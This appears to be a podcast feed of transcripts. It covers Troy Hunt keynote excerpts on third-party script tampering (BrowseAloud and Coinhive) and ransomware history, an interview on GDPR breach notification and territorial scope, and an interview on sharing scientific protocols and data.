The supply chain bit I think is really fascinating. And the bit that we looked at was really just this sort of embedding of external services. It doesn't touch on all the libraries that we're dependent on or all the other things that go into modern-day software. But this is becoming a problem. And that's before we even get into things like the hardware supply chain. So, where does your hardware come from? Do you trust that party?
And there's certainly some very interesting things going on at the moment that cast some really massive doubts about where we can trust our equipment to come from. So, have a think about all the different bits and pieces that go into modern-day applications and indeed into physical infrastructure as well. On the detection side of things, I sort of metaphorically posed the question for us and said, ''Look, how well equipped are you to detect if there's large amounts of data being exfiltrated from your network or from your website?'' And in fairness, this is a nontrivial problem as well. This is not an easy thing, but it's an important thing. Because again, as I said a couple of times, like you really don't want to be getting emails from me. You especially don't want to see like a tweet from me saying, ''Do you have a security contact at your company?''
This is not the way you want your detection to work. Much better to detect it quietly and try and stop it before it happens in the first place. And finally, that piece on the money pit. And again, I have this huge amount of sympathy for organizations that are having to make decisions today about where they spend their money. Particularly when there are a bunch of infosec companies out there who are claiming that will solve all your problems with this one shiny thing. Because of course, the one shiny thing is a very attractive thing to the people that hold the purse strings in a lot of organizations who are very frequently aren't the technical folks but are wowed by flashy presentations.
And I just had a flashback to my corporate life for another moment and day. So, they're the five takeaways from the talk, but I hope that they, if nothing else, sort of give you food for thought about what's going on with your applications in your environment today. ...
We had a unique opportunity in talking with data privacy attorney Sheila FitzPatrick. She lives and breathes data security and is recognized expert on EU and other international data protection laws. FitzPatrick has direct experience in representing companies in front of EU data protection authorities (DPAs). She also sits on various governmental data privacy advisory boards.
During this first part of the interview with her, we focused on the new General Data Protection Regulation (GDPR), which she says is the biggest overhaul in EU security and privacy rules in twenty years.
One important point FitzPatrick makes is that the GDPR is not only more restrictive than the existing Data Protection Directive—breach notification, impact assessment rules—but also has far broader coverage.
Cloud computing companies no matter where they are located will be under the GDPR if they are asked to process personal data of EU citizens by their corporate customers. The same goes for companies (or controllers in GDPR-speak) outside the EU who directly collect personal data – think of any US-based e-commerce or social networking company on the web.
Keep all this in mind as you listen to our in-depth discussion with this data privacy and security law professional.
Cindy Ng
Sheila FitzPatrick has over 20 years of experience running her own firm as a data protection attorney. She also serves as outside counsel for Netapp as their chief privacy officer, where she provides expertise in global data protection compliance, cyber security regulations, and legal issues associated with cloud computing and big data. In this series, Sheila will be sharing her expertise on GDPR, PCI compliance, and the data security landscape.
Andy Green
Yeah, Sheila. I'm very impressed by your bio and the fact that you've actually dealt with some of these PPA's and EU data protection authorities that we've been writing about. I know there's been, so the GPDR will go into effect in 2018, and I'm just wondering what sort of the biggest change for companies, I guess they're calling them data controllers, in dealing with DPA's under the law. Is there something that comes to mind first?
Sheila FitzPatrick
And thank you for the compliment by the way. I live and breathe data privacy. This is the stuff I love. GPR ...I mean is certainly the biggest overhaul in 20 years, when it comes to the implication of new data privacy regulations. Much more restrictive than what we've seen in the past. And most companies are struggling because they thought what was previously in place was strict.
There's a couple things that stick out when it comes GDPR, is when you look at the roles of the data controller verses the data processor, in the past many of the data processors, especially when you talk about third party outsourcing companies and any particular cloud providers, have pushed sole liability for data compliance down to their customers. Basically, saying you decide what you're going to put in our environment, you have responsibility for the privacy and security aspects. We basically accept minimal responsibility. Usually, it's around physical security.
The GDPR now is going to put very comprehensive and very well-defined regulations and obligations in place for data processors as well. Saying that they can no longer flow responsibility for privacy compliance down to their customers. And if they're going to be... even if they... often times, cloud providers will say, "We will comply with the laws in countries where we have our processing centers." And that's not sufficient under the new laws. Because if they have a data processing center say in in UK, but they're processing the data of a German citizen or a Canadian citizen or someone from Asia Pacific, Australia, New Zealand, they're now going to have to comply with the laws in those countries as well. They can't just push it down to their customers.
The other part of GDPR that is quite different and it's one of the first times it's really going to be put into place is that it doesn't just apply to companies that have operations within the EU. It is basically any company regardless of where they're located and regardless of whether or not they have a presence in the EU, if they have access to the personal data of any EU citizen they will have to comply with the regulations under the GDPR. And that's a significant change. And then the third one being the sanction. And the sanction can be 20,000,000 euro or 4% of your global annual revenue, whichever is higher. That's a substantial change as well.
Andy Green
Right, So that's some big, big changes. So you're referring to I think, what they call 'territorial scope'? They don't have to necessarily have an office or an establishment in the EU as long as they are collecting data? I mean we're really referring to social media and to the web commerce, or e-commerce.
Sheila FitzPatrick
Absolutely, but it's going to apply to any company. So even if for instance you say, "Well, we don't have any, we're just a US domestic company", but if you have employees in your environment that hold EU citizenship, you will have to protect their data in accordance with GDPR. You can't say, well they're working the US, therefore US law applies. That's not going to be the case if they know that the individual holds citizenship in the EU.
Andy Green
We're talking about employees, or...?
Sheila FitzPatrick
Could be employees, absolutely. Employees...
Andy Green
Anybody?
Sheila FitzPatrick
Anybody.
Andy Green
Isn't that interesting? I mean one question about this expanded territorial scope, is how are they going to enforce this against US companies? Or not just US, but any company that is doing business but doesn't necessarily have an office or an establishment?
Sheila FitzPatrick
Well it can be... see what happens under GDPR is any individual can file a complaint with the ports in basically any jurisdiction. They can file it at the EU level. They can file with it within the countries where they hold their citizenship. They can file it now with US courts, although the US courts... and part of that is tied to the new privacy shield, which is a joke. I mean, I think that will be invalidated fairly quickly. With the whole Redress Act, it does allow EU citizens to file complaints with the US courts to protect their personal data in accordance with EU laws.
Andy Green
So, just to follow through, if I came from the UK into the US and was doing transactions, credit card transactions, my data would be protected under EU law?
Sheila FitzPatrick
Well, if the company knows you're an EU citizen. They're not going to necessarily know. So, in some cases if they don't know, they're not going to held accountable. But if they absolutely do know then they will have to protect that data in accordance with UK or EU law. Well, not the UK... if Brexit goes through, the EU law won't matter. The UK data protection act will take precedence.
Andy Green
Wow. You know it's just really fascinating how the data protection and privacy now is just so important. Right, with the new GPDR? For everybody, not just the EU companies.
Sheila FitzPatrick
Yeah, and its always been important, it's just the US has a totally different attitude. I mean the US has the least restrictive privacy laws in the world. So for individuals that have really never worked or lived outside of the US, the mindset is very much the US mindset, which is the business takes precedence. Where everywhere else in the world, the fundamental right to privacy takes precedence over everything.
Andy Green
We're getting a lot of questions from our customers the new Breach Notification rule...
Sheila FitzPatrick
Ask me.
Andy Green
...in the GDPR. I was wondering if you could talk about... What are one the most important things you would do when you discover a breach? I mean if you could prioritize it in any way. How would you advise a customer about how to have a breach response program in a GDPR context?
Sheila FitzPatrick
Yeah. Well first and foremost you do need to have in place, before a breach even occurs, an incident response team that's not made up of just the IT. Because normally organizations have an IT focus. You need to have a response team that includes IT, your chief privacy officer. And if the person... normally a CPO would sit in legal. If he doesn't sit in legally, you want a legal representative in there as well. You need someone from PR, communications that can actually be the public-facing voice for the company. You need to have someone within Finance and Risk Management that sits on there.
So the first thing to do is to make sure you have that group in place that goes into action immediately. Secondly, you need to determine what data has potentially been breached, even if it hasn't. Because under GDPR, it's not... previously it's been if there's definitely been a breach that can harm an individual. The definition is if it's likely to affect an individual. That's totally different than if the individual could be harmed. So you need to determine okay, what data has been breached, and does it impact an individual?
So, as opposed to if company-related information was breached, there's a different process you go through. Individual employee or customer data has been breached, the individual, is it likely to affect them? So that's pretty much anything. That's a very broad definition. If someone gets a hold of their email address, yes, that could affect them. Someone could email them who is not authorized to email them.
So, you have to launch into that investigation right away and then classify the data that has been any intrusion into the data, what that data is classified as.
Is it personal data?
Is it personal sensitive data?
And then rank it based on is it likely to affect an individual?
Is it likely to impact an individual? Is it likely to harm an individual?
So there could be three levels.
Based on that, what kind of notification? So if it's likely to affect or impact an individual, you would have to let them know. If it's likely to harm an individual, you absolutely have to let them know and the data protection authorities know.
Andy Green
And the DPA, right? So, if I'm a consumer, the threshold is... in other words, if the company's holding my data, I'm not an employee, the threshold is likely to harm or likely to affect?
Sheila FitzPatrick
Likely to affect.
Andy Green
Affect. Okay. That's a little more generous in terms of...
Sheila FitzPatrick
Right. Right. And that has changed, so it's put more accountability on a company, because you know that a lot of companies have probably had breaches and have never reported them. So, because they go oh well, there was no Social Security Number, National Identification number, or financial data. It was just their name and their address and their home phone number or their cell phone. And the definition previously has been well, it can't really harm them. We don't need to let them know.
And then all of a sudden people's names show up on these mailing lists. And they're starting to get this unsolicited marketing. And they can't determine whether or not... how did they get that? Was it based on a breach or is it based on trolling the Internet and gathering information and a broker selling that information? That's the other thing. Brokers are going to be impacted by the new GDPR, because in order to sell their lists they have to have explicit consent of the individual to include their name on a list that they're going to sell to companies.
Andy Green
Alright. Okay. So, it's quite consumer friendly compared to what we have in the US.
Sheila FitzPatrick
Yes.
Andy Green
Is there sort of new rules about what they call sensitive data? And if you're going to process certain classes of sensitive data, you need approval from the... I think at some point you might need approval from the DPA? You know what I'm referring to? I think it's the...
Sheila FitzPatrick
Yes. Absolutely. I mean, that's always been in place in most of the member states. So, if you look at the member states that have the more restrictive data privacy laws like Germany, France, Italy, Spain, Netherlands, they've always had the requirement that you have to register the data with the data protection authorities. And in order to collect and transfer outside of the country of origination any sensitive data, it did require approval.
The difference now is that any personal data that you collect on an individual, whether it's an employee, whether it's a customer, whether it's a supplier, you have to obtain unambiguous and freely given explicit consent. Now this is any kind of data, and that includes sensitive data. Now the one difference with the new law is that there are just a few categories which are truly defined as sensitive data. That's not what we think of sensitive data. We think of like birth date. Maybe gender. That information is certainly considered sensitive under... that's personal data under EU law and everywhere else in the world, so it has to be treated to a high degree of privacy. But the categories that are political/religious affiliation, medical history, criminal convictions, social issues and trade union membership: that's a subset. It's considered highly sensitive information in Europe. To collect and transfer that information is going to now require explicit approval not only from the individual but from the DPA. Separate from the registrations you have done.
Andy Green
So, I think what I'm referring to is what they call the Impact Assessment.
Sheila FitzPatrick
Privacy Impact Assessments have to be conducted now anytime... and we've always... Anytime I've worked with any company, I've implemented Privacy Impact Assessments. They're now required under the new GDPR for any collection of any personal data.
Andy Green
But sensitive data... I think they talked about a DNA data or bio-related data.
Sheila FitzPatrick
Oh no. So, what you're doing... What happened under GPDR, they have expanded the definition of personal data. And so that not the sensitive, that's expanding the definition of personal data to include biometric information, genetic information, and location data. That data was never included under the definition of personal data. Because the belief was, well you can't really tie that back to an individual. They have found out since the original laws put in place that yes you can indeed tie that back to an individual. So, that is now included into the definition.
Andy Green
In sort of catching up a little bit with that technology?
Sheila FitzPatrick
Yeah. Exactly. But part of what GPDR did was it went from being a law around processing of personal data to a law that really moves you into the digital age. So, it's anything about tracking or monitoring or tying different aspects or elements of data together to be able to identify a person. So, it's really entering into the digital age. So, it's trying to catch up with new technology.
Andy Green
I have one more question on the GDPR subject. There's some mention in the law about sort of outside bodies can certify...?
Sheila FitzPatrick
Well, they're talking about having private certifications and privacy codes. Right now, those are not in place. The highest standard you have right now for privacy law is what's call Binding Corporate Rules. And so companies that have their Binding Corporate rules in place, there's only less than a hundred companies worldwide that have those. And actually, I've written them for a number of companies, including Netapp has Binding Corporate rules in place. That is the gold standard. If you have BCRs, you are 90% compliant with GDPR. But the additional certifications that they're talking about aren't in place yet.
Andy Green
So, it may be possible to get a certification from some outside body and that would somehow help prove your... I mean, so if an incident happens and the DPA looks into it, having that compliance should help a little bit in terms of any kind of enforcement action?
Sheila FitzPatrick
yes, it certainly will once they come up with what those are. Unless you have Binding Corporate Rules. But right now... I mean if you're thinking something like a trustee. No. there is no trustee certification. Trustee is a US certification for privacy, but it's not a certification for GDPR.
Andy Green
Alright. Well, thank you so much. I mean these are questions that, I mean it's great to talk to an expert and get some more perspective on this.
Learning about the CIA’s tips and tricks on disguising one’s identity reminded us that humans are creatures of habit and over a period of time, can illuminate predictable behavioral patterns, which are presented as biometric data. As a result, businesses can leverage and integrate these data points with their operations and sales process.
For instance, businesses are buying data about one’s health and also creating patents to measure a user’s pulse and temperature. Others are learning about the psychology about a user and making it difficult for a user to cancel a service.
Other articles discussed:
Vulnerability after vulnerability, we’ve seen that there’s no perfect model for security. Hence, the catchphrase, “If you can’t build in security, then build in accountability.”
But history has also shown that even if there was enough political will and funding, consumers aren’t interested in paying a huge premium for security when a comparable product with the features they want is available much more cheaply.
Will that theory hold when it comes to self-driving cars? At the very least, safety should be a foundational tenet. What’s the likelihood that anyone would enter a self-driving car knowing that a number of things could go wrong?
Other articles discussed:
Panelists: Cindy Ng, Kris Keyser, Kilian EnglertTroy Hunt, creator of “Have I been pwned”, gives a virtual keynote that explores how security threats are evolving - and what we need to be especially conscious of in the modern era.
In this keynote, you’ll learn:
and much more!
Troy Hunt: Then moving on another one I think is really fascinating today is to look at the supply chain, the modern supply chain. And what we're really talking about here is what are the different bits and pieces that go into modern-day applications? And what risks do those bits and pieces then introduce into the ecosystem?
There's some interesting stats, which helps set the scene for why we have a problem today. And the first that I want to start with, the average size of webpage, just over 700 kilobytes in 2010. But over time, websites have started to get a lot bigger. You fast forward a couple of years later and they're literally 50% larger, growing very, very fast. Go through another couple of years, now we're up to approaching 2 megabytes. Get through to 2016 and we're at 2.3 megabytes. Every webpage is 2.3 megabytes.
And when you have a bit of a browse around the web, maybe just open up the Chrome DevTools and have a look at the number of requests that come through. Go through on the application part of the DevTools, have a look at the images. And have a look at how big they are. And how much JavaScript, and how many other requests there are. And you realize not just how large pages are, but how the composition is made up from things from many, many different locations. So, we've had this period of six years where we've tripled the average size of a webpage. And of course, ironically, during that period we've become far more dependent on mobile devices as well. Which very frequently have less bandwidth or more expensive bandwidth, particularly if you're in Australia.
So, we've sort of had this period where things have grown massively in an era where we really would have hoped that maybe they'd actually be a little bit more efficient. The reason I stopped at 2016 is because the 2.3-megabyte number is significant. And the reason it's significant is because that's the size of Doom. So, remember Doom, like the original Doom, like the 1993 Doom, where if you're a similar age to me or thereabouts, you probably blew a bunch of your childhood. When you should've been doing homework, just going through fragging stuff with BFG.
So, Doom was 2.3 megabytes. That's the original size of it. And just as a reminder of the glory of Doom, remember what it was like. You just wander around these very shoddy looking graphics, but it was a first-person shoot-em-up. There were monsters, and aliens, and levels, and all sorts of things. Sounds. All of that went into two floppy disks and that's your 2.3 megabytes. So, it's amazing to think today when you go to a website, you're looking at the entire size of Doom, bundled into that one page, loaded on the browser.
Now, that then leads us into where that all goes. So, let's consider a modern website. The U.S. Courts website. And I actually think it's pretty cool looking government website. Most government websites don’t look this cool. But, of course, to make a website look cool, there's a bunch of stuff that's got to go into it.
So, if we break this down by content type, predictably images are large. You've got 1.1 megabytes worth of images, so almost half the content there is just images. The one that I found particularly fascinating though when I started breaking this apart is the script. Because you've got about 3/4 of a megabyte worth of JavaScript. Now keep in mind as well, JavaScript can be very well optimized. I mean, we should be minimizing it. It should be quite efficient. So, where does 726 kilobytes worth of script go?
Well, one of the things we're seeing with modern websites is that they're being comprised of multiple different external services. And in the case of the U.S. Courts website, one of those web services is BrowseAloud.
And BrowseAloud is interesting. So, this is an accessibility service made by a company called Texthelp. And the value proposition of BrowseAloud is that if you're running a website, and accessibility is important to you...and just to be clear about what we mean by that, if someone is visually impaired, if they may be English is second language, if they need help reading the page, then accessibility is important. And accessibility is particularly important to governments because they very often have regulatory requirements to ensure that their content is accessible to everyone.
So, the value proposition of a service like BrowseAloud is that there's this external thing that you can just embed on this site. And the people building the site can use all their expertise to sort of actually build the content, and the taxonomy, and whatever else of the site. They just focus on building the site and then they pull in the external services. A little bit like we're pulling an external library. So, these days there's a lot of libraries that go into most web applications. We don't go and build all the nuts and bolts of everything. We just throw probably way too much jQuery out there. Or other themes that we pull from other places.
Now, in the case of BrowseAloud, it begs the question, what would happen if someone could change that ba.js file? And really where we're leading here, is that if you can control the JavaScript that runs on a website, what would you do? If you're a bad dude, what could you do, if you could modify that file? And the simple answer is is that once you're running JavaScript in the browser and you have control over that JavaScript, there is a lot you can do. You can pull in external content, you can modify the DOM. You can exfiltrate anything that can be accessed via client script.
So, for example, all the cookies, you can access all the cookies so as long as the cookies aren't flagged as HTTP only. And guess what? A lot of them which should be, still are. So, you have a huge amount of control when you can run arbitrary JavaScript on someone else's website. Now, here's what went wrong with the BrowseAloud situation. So, you've got all of these websites using this exact script tag, thousands of them, many of them government websites.
And earlier this year, Scott Helme, he discovered that the ICO, the Information Commissioner's Office in the UK, so basically the data regulator in the UK, was loading this particular JavaScript file. And at the top of this file, was some script which shouldn't be there. And if you look down at about the third line and you see Coinhive, you start to see where all of this has gone wrong.
Now, let's talk about Coinhive briefly. So, everyone's aware that there is cryptocurrency and there is crypto currency mining. The value proposition of Coinhive...and you can go to coinhive.com in your browser. Nothing bad is going to happen. You can always close it. But bear with me, I'll explain. So, the value proposition of coinhive.com is you know how people don't like ads. You know because you get a website, and there's tracking, and they're obnoxious, and all the rest of it. Coinhive believe that because they don't like ads, but you might still want to monetize your content, what you can do is you get rid of the ads, and you just run a crypto miner on people's browser. And what could go wrong? And in fairness, if there's no tracking and you're just chewing up a few CPU cycles, then maybe that is a better thing, but it just feels dirty. Doesn't it?
You know, like if you ever go to a website and there's a Coinhive crypto miner on there, and they usually mine Monero, and you see your CPU spiking because it's trying to chew up cycles to put money in someone else's pocket, you're going to feel pretty dirty about it. So, there is a valid value proposition for Coinhive. But unfortunately, when you're a malicious party, and there's a piece of script that you can put on someone else's website, and you can profit from it, well then obviously, Coinhive is going to be quite attractive to you as well.
So, what we saw was this Coinhive script being embedded into the BrowseAloud JavaScript file, then the BrowseAloud JavaScript file being embedded into thousands of other websites around the world. So, U.S. Courts was one. U.S. House of Representatives was another. I mentioned the Information Commissioner's Office, the NHS in Scotland, the National Health Service, so all of these government websites.
Now, when Scott found this, one of the things that both of us found very fascinating about it is that there are really good, freely accessible browser security controls out there that will stop this from happening. So, for example, there are content security policies.
And content security policies are awesome because they're just a response killer, and every single browser supports them. And a CSP lets you say, ''I would like this browser to be able to load scripts from these domains and images from those domains.'' And that's it. And then if any script tries to be loaded from a location such as coinhive.com, which I would assume you're not going to whitelist, it gets blocked. So, this is awesome. This stops these sorts of attacks absolutely dead.
The adoption of content security policies is all the sites not using it. And that's about 97%. So, it's about a 3% adoption rate of content security policies. And the reason why I wanted to flag this is because this is something which is freely accessible. It's not something you go out and spend big bucks on a vendor with. When I was in London at the Infosecurity EU Conference, loads of vendors there selling loads of products and many of them are very good products, but also a lot of money. And I'm going, ''Why aren't people using the free things?'' Because the free things can actually fix this. And I think it probably boils down to education more than anything else.
Now, interestingly, if we go back and look at that U.S. Courts website, here's how they solved the problem. So, they basically just commented it all out, and arguably this does actually solve the problem. Because if you comment out the script, and someone modifies it, well, now it's not a problem anymore. But now you've got an accessibility problem. I actually had people after I've been talking about this, say, ''Oh, you should never trust third-party scripts. You should just write all this yourself.'' This is an entire accessibility framework with things like text to speech. You're not going to go out and write all that yourself. You're actually got to go and build content.
Instead, we'd really, really like to see people actually using the security controls to be able to make the most of services like this, but do so in a way that protects them if anything goes wrong. Now, it's interesting to look now at sites that are still embedding BrowseAloud but are doing so with no CSP. And in case anyone's wondering, no Subresource Integrity as well. So, things like major retailers, there are still us government sites, there are still UK government sites. And when I last looked at this, I found a UK transportation service as well. Exactly the same problem.
And one of the things that that sort of makes me lament is that even after we have these issues where we've just had an adversary run arbitrary script and everyone's browser, and let's face it, just Coinhive is dodging a bullet. Because that is a really benign thing in the scope of what you could have done if you could have run whatever script you wanted in everyone's browser. But even after all that these services are still just doing the same thing. So, I don't think we're learning very well from previous incidents. ...
Troy Hunt, creator of “Have I been pwned”, gives a virtual keynote that explores how security threats are evolving - and what we need to be especially conscious of in the modern era.
In this keynote, you’ll learn:
and much more!
Troy Hunt: Where I'd like to start this talk is just to think briefly about some of these, sort of, conventional threats that we've had, and in particular some of the ways in which some of the just absolute fundamentals of InfoSec we're still struggling with today just as we were yesterday. And I wanted to kind of set a bar, and this will be...as you will see in a moment, it's kind of like a very, very low bar. And then we'll have a look at some of the newer things.
I was looking around for examples and I actually...it's always nice to talk about something in your own country where you've come from, so I wanted to try and find an example that showed where that bar was. And very fortuitously, not so much for them, we had a little bit of an incident with CommBank. CommBank are pretty much the largest bank in the country, certainly one of our big four banks. As part of our royal commission into banking at the moment, where all the banks are coming under scrutiny, there was a little bit of digging done on the CommBank side and they discovered that there had actually been an incident which they needed to disclose. One of the reasons it's fascinating is because banks are, sort of, the bastions of high levels of security. So we have this term, we literally have a term, bank-grade security, which of course people imply means very, very good security, not always that way but that's the expectation.
So CommBank had to disclose a bit of an incident where they said, "Look, we're decommissioning a data center, moving from one data center to another and as part of the decommissioning processes, what we needed to do was take all the tapes with the customer data on them and send them for destruction. And what they've done is they've loaded all of the tapes up onto a truck, I've got some file footage, here's the Commonwealth Bank truck. So all of the tapes are on the truck, the truck's driving along, they're taking all the data from this one data center and they're going to go and securely destroy it. Now, there's about 12 million customer records on the back of the truck, and it's driving along and it turns out they may have put just a few too many datas on the truck and some of it fell off. And this was the disclosure, like, there was some data that was lost, it might have fallen off the back of the truck.
And there was literally a statement made by the auditors, I think it was KPMG that audited them, they said, "Forensic investigators hired to assess the breach, retraced the route of the truck to determine whether they could locate the drives along the route but were unable to find any trace of them."
And I just find it fascinating that in this era of high levels of security in so many ways and so much sophistication, we're still also at the point where data is literally falling off a back of a truck. Not metaphorically, but literally falling off the back of a truck. Possibly, they couldn't find it again so maybe it didn't fall off but they were the headlines we were faced with a few months ago.
So it's interesting to sort of keep that in mind and you'll see other, sort of, analogous things to data falling off the back of a truck, perhaps in a more metaphorical sense, every single day online. I mean the canonical one at the moment is data exposed in open S3 buckets. Going back to late 2016, early last year it was constantly data in exposed MongoDBs with no passwords on it. So we're leaving data lying all over the place, either digitally or potentially even physically in the case of CommBank.
Now, moving back towards some more sort of traditional InfoSec threats as well, one of the interesting things to start thinking about here is the monetization of pipleline. So what are the ways in which our data gets monetized? And this is where, I think, the history is quite interesting as well because we often think about things like ransomware as being a very modern-day problem. Particularly, I think, last year was probably a bit of a peak for ransomware news just seeing consistently everything from hospitals to police departments to you name it, was getting done by ransomware.
We're seeing this happen all the time and we do think of it as a modern internet-driven problem, but ransomware also goes back a lot further than that as well. And this was the AIDS Trojan. This dates all the way back to 1989 and this was ransomware which would encrypt the C drive and you'd need to have a private key in order to unlock the contents of the drive.
There was no bitcoin, of course, you've got to get an international money order, make it payable to PC Cyborg Corporation, and then all you do is you just send it off to this location in Panama. Imagine this as well, right, you would have had to actually put the check in an envelope and then it would go by trucks and planes and boats, and whatever else, eventually get there and then, I guess, they would open it and cash the money and then maybe send you back a key. It sounds like a lot of labor, doesn't it compared to ransomware today? But this was a thing so there was ransomware going back 30 years.
Now, of course, it didn't distribute via the internet in the late '80s, it distributed via envelopes and this was literally shipped around, I guess in this case, in like a 5.25-inch floppy disk, quite possibly. And you'd get this in the mail, and maybe this was like the olden day equivalent of finding a USB in a car park, you know? Like, something just turns up and you think, "Oh, this will be interesting, chuck this in and see what happens."
But this was a problem decades ago and it's still a problem today, and this sort of speaks to the point of the modern state of insecurity is very much like what it was many years ago as well. But of course, due to the internet and due to the rise of cryptocurrencies, the whole thing just works far more efficiently at least on behalf of those breaking into systems.
But what this also does is creates a bit of an economy, and there's an economy around ransomware, not necessarily just for bad guys because by encrypting devices, and of course many organizations not having appropriate backups, it also leads to an economy in organizations that would help you get your data back, proven data recovery or PDR, 97.2%. And that is a pretty impressive success rate because we often think of ransomware as being very effective, and very often it is very effective, it's good crypto that you actually need the key for.
And occasionally we see smart researchers manage to break that and provide keys publicly to people, but very frequently it's very effective ransomware that's hard to get access to. So it makes you wonder how an organization like this manages to achieve such a high success rate. And we did actually learn how they achieved it. The FBI said subsequent investigation confirmed that PDR was only able to decrypt the victims' files by paying the subject the ransom amount via Bitcoin. And this is a kind of another one of these really multifaceted issues which I struggle with mentally. And I'll explain why. On the one hand, I struggle with the fact that someone is paying ransoms, because I think within all of us we don't want to feel like you ever should pay the bad guys, because if you pay the bad guys they're just going to continue being bad and it legitimizes their business.
On the other hand, I can also understand why organizations get really desperate as well. We've certainly seen a lot of ransoms paid and almost, unfortunately, we've seen data recovered as a result of that. So the economics of paying the ransom are often very good on the victims' behalf regardless of where it sits morally with you.
But because the economics are also very good, it legitimizes organizations like PDR that were charging people the ransom to get their files back. And I'd actually be curious to know if you're gonna pay the equivalent of the ransom anyway, why would you pay PDR, why wouldn't you just pay the bad guys? And I suspect that maybe it comes back to that sort of moral high ground, we don't want to legitimize the business, let's pay a professional data recovery organization to get the data back for us, and then we get the end result without sort of legitimizing the business. And I think the bit here that sits really badly with people is that there was obviously some level of deceit going on here where PDR was saying, "Look, we'll get your data back for you." And then they just went and paid the ransom. I would imagine that they actually mark up the ransom as well because they've got to have a margin on this thing, either that or they somehow managed to negotiate it.
So that's a sort of curious indictment of where we're at today insofar as we've had ransomware for decades, it's still here, different problems now but still very, very effective in creating this other ecosystem around monetization.
After the latest Microsoft Ignite conference, the enduring dilemma of how CISOs explain security matters to the C-Suite bubbled to the surface again. How technical do you get?
Also, when the latest and greatest demos are given at one of the world’s most premier technology show, it can be easy to get overwhelmed with fancy new tools. What’s more important is to remember the basics: patching, least privilege, incident response, etc.
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Matt Radolec, Mike Buckbee
Reminder: it's not "your data".
— Lenny Teytelman (@lteytelman) July 16, 2018
It's the patients' data
It's the taxpayers' data
It's the funder's data
-----------------
If you're in industry or self-fund the research & don't publish, then you have the right not to share your data. Otherwise, it's not your data.
We continue our conversation with Protocols.io founder Lenny Teytelman.In part two of our conversation, we learn more about his company and the use cases that made his company possible. We also learn about the pros and cons of mindless data collection, when data isn’t leading you in the right direction and his experience as a scientist amassing enormous amount of data.
Cindy Ng: Welcome Lenny. Why don't you tell us a little bit more about what you do at Protocols and some of the goals and use cases?
Lenny Teytelman: So I had no entrepreneurial ambitions whatsoever. Actually, I was in a straight academic path as a yeast geneticist driven just by curiosity in the projects that I was participating in. And my experience out at MIT as a postdoc was that literally, the first year and a half of my project went into fixing just one step of the research recipe of the protocol that I was using. Instead of a microliter of a chemical, it needed five. Instead of an incubation for 15 minutes, it needed an hour and the insane part is that at the end of the day, that's not a new technique. I can't publish an article on it because it's just a correction of something that's previously published and there is no good infrastructure. There's no GitHub of science methods. There's no good infrastructure for updating and sharing such corrections and optimizations.
So the end result of that year and a half was that I get no credit for this because I can't publish it and everybody else was using the same recipe is either getting completely misleading results or has to spend a year or two rediscovering what I know, what I would love to share, but can't.
It led to this obsession with creating a central open access place that makes it easy for the scientist to detail precisely what the research steps were, what are the recipes, and then after they've published, giving them the space to keep this current by sharing the corrections and optimizations and making that knowledge discoverable.
Cindy Ng: There's a hole in the process and you're connecting what you can potentially do now with what you did previously and not lose all the work. That's brilliant.
Lenny Teytelman: I shouldn't take too much credit for it because a lot of people have had this same idea over the last 20 years and there have been several attempts to create a central place. One of the hard things is that this isn't just about technology and building a website and creating a good UI, UX for people to share.
One of the hard things is that it's a culture change, right? So if we are used to publishing a scientist's made brief methods that have things like context author for details, or we roughly follow the same procedure as reported in another paper and then good luck figuring out what that roughly means, what are the slight modifications, but then one of the hard things as the culture change and getting scientists to adopt platforms like this.
Cindy Ng: So it sounds like the scientists prior who wanted to create something like Protocols, they were ahead of their time.
Lenny Teytelman: I think yes. I know of a number of efforts to create exactly what we've done. Some of the people from those have actually been huge supporters and advisors, partners helping us avoid the mistakes and helping us succeed. So, it's a long quest, a long journey towards this, but a lot of them I give them credit for the same idea and it's exactly what you said, being ahead of your time.
Cindy Ng: Because you're a scientist and have a lot of expertise collecting enormous amount of data, a lot of companies nowadays because data's the new oil, they think that, "Oh, we should just collect everything. Well, we might be able to solve a new business problem or we might be able to use it much later on." Then actually research has been done about that, that that's not a good idea because then you end up solving really silly problems. What is your approach?
Lenny Teytelman: There are sort of two different camps. One argues that you should be very targeted with the data that you collect. You should have a hypothesis, you should have a research question that's guiding you towards an experiment and towards the data that you're collecting. And another one is, let's be more descriptive. Let's just get data and then look inside and see what pops out. See what is surprising.
There are two camps and I know both types of scientists. I was more in one camp than another, but there is value to both. The tricky part in science is that you are not aware of the statistics and e-hacking and just what it means to go fishing in large datasets, particularly in genomics, particularly now with a lot of the new technology that we have for generating massive datasets across different conditions, across different organisms, right? And you can sort of drown in data and then if you're not careful, you start looking for signal.
If you're not thinking of the statistics, if you're not thinking almost of multiple testing, correction, you can get these false positives in science where something looks their usual, but it really is just by chance, it's because you're running a lot of tests and slicing data in 100 different ways and one out of 100 times just by chance, you're getting something that looks like an outlier, that looks very puzzling or interesting, but it's actually chance.
So, I don't know about in industry particularly, it seems to me if you're a business and you are just trying to grab everything and feeling that something useful will come out of it. If you're not in the business of doing science, but you're in the business of actual business, it seems to me, intuitively, that you will become very distracted and probably is not the best use of your time or resources. But in science, both approaches are valuable. You just have to be really careful if you are analyzing data without a particular question and you're trying to see what is there that's interesting.
Cindy Ng: If you're collecting everything, do you have a team or a group of people that you're working with to suss out the wrong ideas?
Lenny Teytelman: I see more and more journals, I see more and more academics becoming aware that, "Oh, I need to learn something about statistics, or I need to collaborate with biostatisticians who can help me to be careful about this." There are journals that have started statistics reviews. So it might be a biology paper, but depending on the data and the statistics that are in it, it might need to go to an expert statistician to review to make sure that you've used the appropriate methods and you've thought through the pitfalls that I'm discussing, but there's a lot more to do on this side.
And again, there is the spread…there are teams that are collaborating. And you know they have data scientists or computational biologists and statisticians who are more used to thinking about data. Then you also have people like me who used to do both. And I wasn't a great computational biologist and I wasn't a great geneticist, but my strength was the ability to do both. So, again, it's all over the map and there's a lot of training, a lot of education that still needs to happen to improve how we handle the large data sets.
Cindy Ng: Do you think that data, it's about getting the numbers right, working with statisticians, or the more qualitative side of things where even if the data showing one thing, your, let's say, experience says otherwise?
Lenny Teytelman: Oh, I've been misled by data that I've generated or had access to nonstop. As a scientist, I've given talks on things that I thought were exciting and turned out to be an artifact of how I was doing the analysis and I've experienced that many times. Think at the end of the day, whether you try to be careful or not, we always have a scientist and we always will make mistakes. And that's why I particularly feel that it's so essential for us to share the data because we think we're doing things correctly, but reviewers and other scientists who are reading your papers really can't tell unless they have access to the data that you've used and can run the analysis themselves or use different tools to analyze, and that's where problems come up, that's where mistakes are identified.
